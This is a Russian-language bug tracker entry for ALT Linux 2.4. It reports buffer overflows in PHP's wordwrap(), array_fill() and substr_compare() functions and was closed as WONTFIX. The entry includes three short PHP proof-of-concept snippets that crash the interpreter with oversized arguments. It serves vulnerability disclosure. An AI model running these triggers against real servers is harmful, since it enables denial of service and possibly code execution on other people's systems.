Bug 9462 - Выполнение произвольного кода в PHP и отказ в обслуживании
: Выполнение произвольного кода в PHP и отказ в обслуживании
Status: CLOSED WONTFIX
: ALT Linux 2.4
(All bugs in ALT Linux 2.4/php)
: 2.4
: all Linux
: P2 critical
Assigned To:
:
: http://www.securitylab.ru/vulnerabili...
:
:
:
  Show dependency tree
 
Reported: 2006-04-25 11:04 by
Modified: 2008-02-15 19:04 (History)


Attachments


Note

You need to log in before you can comment on or make changes to this bug.


Description From 2006-04-25 11:04:47
Удаленный пользователь может вызвать отказ в обслуживании или выполнить
произвольный код на целевой системе.

Переполнение буфера обнаружено в функциях wordwrap(),array_fill() и
substr_compare(). Удаленный пользователь, контролирующий входные параметры
функций, может вызвать отказ в обслуживании или выполнить произвольный код на
целевой системе. Примеры:

<?
$a = str_repeat ("A",438013);
$b = str_repeat ("B",951140);
wordwrap ($a,0,$b,0);
?>

<?array_fill  (1,123456789,"Infigo-IS");?>

<?substr_compare ("A","A",12345678);?> 

См. также: http://www.securitylab.ru/vulnerability/265300.php
------- Comment #1 From 2008-02-15 19:04:14 -------
apparently wontfix